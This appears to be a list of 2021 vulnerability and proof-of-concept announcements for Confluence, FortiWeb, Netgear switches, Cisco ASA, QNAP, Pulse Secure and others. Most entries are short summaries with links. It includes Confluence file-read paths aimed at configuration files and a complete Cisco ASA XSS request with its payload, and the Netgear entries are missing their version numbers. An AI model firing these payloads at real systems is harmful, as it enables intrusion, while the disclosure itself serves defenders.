POCs for Atlassian Confluence Server Arbitrary File Read: 1);/WEB-INF/web.xml 2);/WEB-INF/classes/seraph-config.xml 3);/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties 4);/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml https://github.com/ColdFusionX/CVE-2021-26085


Fortinet FortiWeb OS Command Injection PoC The patch will be released at the end of August https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/

ThroughTek "Kalay" Network Device Impersonation Vulnerability Proof of Concept. The vulnerability affects millions of IoT devices.

NETGEAR is aware of a security issue on some models of ProSAFE Gigabit Smart Managed Switches that can let an attacker permanently modify certain system variables. This vulnerability occurs when a remote attacker uses SNMP to access stored XSS on the web management interface. The only system variables that can be accessed and modified because of this vulnerability are system name, system location, and system contact. No other settings are vulnerable, and no network traffic or credentials are exposed. This vulnerability affects the following products: GS724Tv3 and GS716Tv2 with firmware version or earlier GS510TP with firmware version or earlier GS108Tv2 and GS110TP with

Stored XSS in Netgear ProSAFE GS724Tv3 and GS716Tv2 with firmware version or earlier GS510TP with firmware version or earlier GS108Tv2 and GS110TP with firmware version or earlier GS748Tv4 with firmware version or earlier. POC can be found here: (https://cyberant.com/en/knowledge-base-item/cve-2016-7941-xss-in-netgear-prosafe-switches/)

Cisco Adaptive Security Appliance (ASA) XSS POC: POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 Host: ciscoASA.local Content-Type: application/x-www-form-urlencoded Content-Length: 44 SAMLResponse="><svg/onload=alert('PTSwarm')>

QNAP NAS HBS 3 Hybrid Backup Syn Hard-Coded Credentials QLocker Ransomware is using this vulnerability to encrypt files of QNAP customers. https://forum.qnap.com/viewtopic.php?t=160876&p=787015

Write-up of CVE-2021-30481 Source engine remote code execution via game invites https://secret.club/2021/04/20/source-engine-rce-invite.html

Pulse Connect Secure remote code execution through authentication bypass. CVSS V3.1 risk score is 10/10. The vulnerability has been exploited in the wild by the threat actor UNC2630. According to Fireeye UNC2630 may have ties with APT5 and the Chinese government. https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html